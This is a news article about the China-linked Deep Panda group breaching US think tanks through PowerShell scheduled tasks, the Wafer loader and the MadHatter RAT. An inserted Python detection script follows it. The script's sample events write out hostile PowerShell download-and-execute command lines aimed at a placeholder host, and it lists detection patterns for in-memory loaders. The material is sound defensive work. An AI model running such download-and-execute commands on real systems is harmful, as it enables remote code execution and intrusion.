Computers at a number of unnamed national security think tanks were compromised by hackers linked to China seeking intelligence on U.S. policy in Iraq as civil unrest in that country escalates.
The attacks mark a shift in tactics for this particular group, which generally keeps tabs on Western policy makers focused on China and the Asia Pacific region. Experts at Crowdstrike, which has a pro bono relationship with think tanks and provides them with detection capabilities, said the group it calls Deep Panda began its Iraq-related operation on June 18, the same day the Islamic State of Iraq and the Levant (ISIS) took control of the Baiji oil refinery, which refines one-third of the country’s crude oil. China is the largest foreign investor in Iraqi oil.
“It wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq,” wrote Crowdstrike cofounder and CTO Dmitri Alperovitch.
Deep Panda has been active for at least three years, targeting government agencies and private enterprises in the financial, legal and telecommunications industries. Alperovitch said the group’s interest in national security think tanks leads it to target former senior government officials who remain well connected in Washington and in the governments of strategic partners.
“The intelligence services of these nation states are always on the lookout for any clues they may extract from such private communications that may give them an advanced insight into what options government policy makers are considering on particular issues of interest,” Alperovitch said.
The Brookings Institution, a well known Washington think tank, would not respond to specific questions for this article.
“Brookings takes security extremely seriously, and we constantly monitor the evolving technology landscape to ensure our systems are as secure as possible. We do not comment on the details of our information security infrastructure,” said Helen Mohrmann, chief information officer, in a statement emailed to Threatpost.
The Council on Foreign Relations referred Threatpost to a statement: “The Council’s IT architecture is a priority and we continue to do all we can to reduce our vulnerability. We will not comment on reports of specific incidents.”
Deep Panda, like other nation-state sponsored advanced persistent threat groups, uses malware to gain access to computers, establishes a remote connection to those machines and quietly moves data off them. Stealth, Alperovitch said, is a Deep Panda specialty.
The hackers took great pains to avoid detection while infiltrating the think tanks. They used Windows PowerShell to execute scripts remotely, deploying the scripts as scheduled tasks on compromised Windows machines.
“The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection,” Alperovitch said.
Every two hours, the scripts called home to the Deep Panda command and control servers. Once the scripts ran, they downloaded and executed a .NET executable called Wafer, which in turn downloaded and ran the MadHatter remote access Trojan; the Trojan runs from memory in order to leave few traces that the attackers were there.
“They prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time,” Alperovitch said.
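The detection idea in the passage above (scripts handed to powershell.exe on the command line, run from a scheduled task, pulling a .NET loader and then a RAT straight into memory) can be turned into a hunt over process-creation telemetry. The following is an added example written for this page, not CrowdStrike's code and not anything published by the group; the event records are constructed, and their field names mirror Windows Security event 4688 (NewProcessName, ParentProcessName, CommandLine), so mapping your own telemetry onto them is an assumption. The parent-process list, the in-memory patterns and the URLs are illustrative heuristics, not indicators from the article.

```python
"""Hunt for inline or encoded PowerShell launched by the Task Scheduler.

Added example (not CrowdStrike's or the article's code). Field names
follow Windows Security event 4688; adapting your own log format to
them is an assumption. Sample records below are constructed.
"""
import base64
import re
import shlex

# Parent processes typical of a scheduled-task launch (heuristic, not proof).
SCHEDULER_PARENTS = {"taskeng.exe", "taskhostw.exe", "svchost.exe"}

# Switches that hand a script to the interpreter without a file on disk.
COMMAND_SWITCHES = {"-c", "-com", "-comm", "-command"}
ENCODED_SWITCHES = {"-e", "-ec", "-enc", "-encodedcommand"}
FILE_SWITCHES = {"-f", "-file"}

# Switches used to run quietly; each is only a weak signal on its own.
STEALTH_SWITCHES = {"-nop", "-noprofile", "-noni", "-noninteractive",
                    "-w", "-windowstyle"}

# Script content that downloads, evaluates or loads code straight into memory.
IN_MEMORY_PATTERNS = {
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download": re.compile(r"DownloadString|DownloadData|DownloadFile|"
                           r"Invoke-WebRequest|Net\.WebClient", re.I),
    "assembly-load": re.compile(r"Reflection\.Assembly|::Load\(", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE text, not UTF-8."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def encode_for_powershell(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build a sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def split_command_line(command_line: str) -> list:
    """Whitespace-split a Windows command line, keeping quoted spans intact."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return command_line.split()


def extract_inline_script(argv: list) -> str:
    """Return the script carried on the command line, decoding -enc if used."""
    for i, arg in enumerate(argv[:-1]):
        switch = arg.lower()
        if switch in ENCODED_SWITCHES:
            return decode_encoded_command(argv[i + 1])
        if switch in COMMAND_SWITCHES:
            return " ".join(argv[i + 1:]).strip('"')
    return ""


def assess(event: dict) -> dict:
    """Score one process-creation record against the tradecraft described above."""
    image = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return {"suspicious": False, "indicators": [], "script": ""}
    argv = split_command_line(event["CommandLine"])
    switches = {a.lower() for a in argv}
    indicators = []
    parent = event.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
    if parent in SCHEDULER_PARENTS:
        indicators.append("launched-by-task-scheduler")
    if switches & ENCODED_SWITCHES:
        indicators.append("encoded-command")
    if (switches & (COMMAND_SWITCHES | ENCODED_SWITCHES)) and not (switches & FILE_SWITCHES):
        indicators.append("inline-script-no-file")
    stealth = sorted(switches & STEALTH_SWITCHES)
    if stealth:
        indicators.append("stealth-switches:" + ",".join(stealth))
    if "bypass" in switches:
        indicators.append("executionpolicy-bypass")
    script = extract_inline_script(argv)
    hits = sorted(name for name, pat in IN_MEMORY_PATTERNS.items() if pat.search(script))
    if hits:
        indicators.append("in-memory-loader:" + ",".join(hits))
    # Inline scripts are common in admin tooling; require corroboration.
    suspicious = "inline-script-no-file" in indicators and (
        bool(hits) or "launched-by-task-scheduler" in indicators)
    return {"suspicious": suspicious, "indicators": indicators, "script": script}


def find_suspicious(events: list) -> list:
    """Indices of the records worth an analyst's attention."""
    return [i for i, ev in enumerate(events) if assess(ev)["suspicious"]]


# Constructed sample telemetry (hypothetical hosts, paths and URLs).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE2_SCRIPT = ("[Reflection.Assembly]::Load((New-Object Net.WebClient)"
                 ".DownloadData('http://c2.example.invalid/stage2.bin'))")
SAMPLE_EVENTS = [
    {"NewProcessName": PS_IMAGE, "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"NewProcessName": PS_IMAGE, "ParentProcessName": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": 'powershell.exe -NoP -W Hidden -c "IEX (New-Object Net.WebClient)'
                    ".DownloadString('http://c2.example.invalid/stage')\""},
    {"NewProcessName": PS_IMAGE, "ParentProcessName": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": "powershell.exe -NonInteractive -enc " + encode_for_powershell(STAGE2_SCRIPT)},
]

if __name__ == "__main__":
    for i in find_suspicious(SAMPLE_EVENTS):
        result = assess(SAMPLE_EVENTS[i])
        print(f"event {i}: {', '.join(result['indicators'])}\n  script: {result['script']}")
```

The design point is the corroboration rule in assess(): an inline `-Command` is too common in legitimate automation to alert on alone, but inline script plus a Task Scheduler parent, or plus download-and-evaluate primitives in the decoded text, matches the pattern described in the article while keeping the file-based `-File` case quiet. Decoding `-EncodedCommand` as UTF-16LE rather than UTF-8 matters; the wrong codec turns the payload into unreadable text and hides the loader.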
Once inside the think tank networks, they moved laterally using stolen credentials, mounted network file shares, and compressed and encrypted data before moving it off the respective networks.
“They knew exactly which users to target based on their research policy area, and they rapidly pivoted from China/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements changed,” Alperovitch said.
Deep Panda was also implicated last year in a watering hole attack against the U.S. Department of Labor Site Exposure Matrices (SEM) website. Researchers at AlienVault linked the command and control infrastructure used in that compromise to Deep Panda. The DOL compromise redirected visitors to a site hosting the Poison Ivy remote access Trojan. The SEM website is a repository of data on toxic substances present at Department of Energy facilities, meaning the targets were likely DOE employees.
This article was updated at 12 p.m. ET with a comment from the Brookings Institution.